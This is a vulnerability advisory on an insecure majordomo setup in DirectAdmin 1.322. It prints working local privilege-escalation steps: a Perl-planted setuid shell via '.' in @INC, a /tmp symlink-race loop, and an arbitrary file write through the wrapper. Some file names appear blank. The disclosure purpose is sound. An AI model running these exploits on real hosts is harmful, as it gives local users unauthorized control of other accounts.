DirectAdmin 1.322 - insecure majordomo setup allows for privilege escalation

Note: this issue was already covered in the majordomo documentation. The issue here is that DirectAdmin used an insecure, default setup of this 3rd party software.


Due to an insecure default setup of the majordomo software, local users could escalate privileges to user:group majordomo:daemon.

UPDATE: 06/02/2010 - playing with this again for a few minutes reveals this was in fact trivially rootable through DirectAdmin, and in multiple ways.


Local users could escalate privileges to majordomo.daemon. This happens when running "/etc/virtual/majordomo/wrapper config-test" because the wrapper will look for a file called "" from the paths inside @INC. Since the file is not found in any of the paths held in @INC, and since the very last path that is looked for in @INC is "." (the current directory), a local user can create a file called "" inside the same directory that they run "/etc/virtual/majordomo/wrapper config-test", and the wrapper will attempt to execute that file. Since the wrapper runs as user:group majordomo:daemon, we must first give world writable permissions to our own home directory (or you can probably just use /tmp).

Here is example output of running the command mentioned above:

[user@host ~]$ /etc/virtual/majordomo/wrapper config-test
---------------- Config-test for Majordomo ----------------

[ ... ]

Good: 'require'd /etc/virtual/majordomo/ okay.
Good: found okay.
Can't locate in @INC (@INC contains: [ ... ]
.) at /etc/virtual/majordomo/config-test line 129

Note the "." at the very end of the "@INC contains" section.

[user@host ~]$ cat > << EOF

open my $shell_fh, '>', 'foo.c' or die $!;
print $shell_fh 'int main() { setreuid(102,102); setregid(2,2); system("/bin/bash"); }' . "\n";
close $shell_fh;

system("gcc foo.c -o foo");
system("chmod 6755 foo");
[user@host ~]$ chmod 755 ~/
[user@host ~]$ chmod 777 ~
[user@host ~]$ /etc/virtual/majordomo/wrapper config-test
[user@host ~]$ ./foo
[majordmomo@host ~]$ id
uid=102(majordomo) gid=2(daemon) groups=503(user)

2 other issues were also reported, but won't be fully discussed here since the fix was simply a proper setup of the software. Examples can be found below.

[user@host ~]$ grep -n /tmp/log
327:$log_file = "/tmp/log.$$";

[user@host ~]$ cd /tmp
[user@host /tmp]$ for x in `seq 1000 30000` ; do ln -s /etc/virtual/majordomo/foo log.$x ; done
[user@host /tmp]$ /etc/virtual/majordomo/wrapper digest
mj_digest: ABORT
[user@host /tmp]$ ls /etc/virtual/majordomo/foo

[user@host ~]$ chmod 777 ~
[user@host ~]$ /etc/virtual/majordomo/wrapper -f /home/user/test -a foo
[user@host ~]$ ls -l test
-rw-rw-r--  1 majordomo daemon    1 Sep  7 01:28 test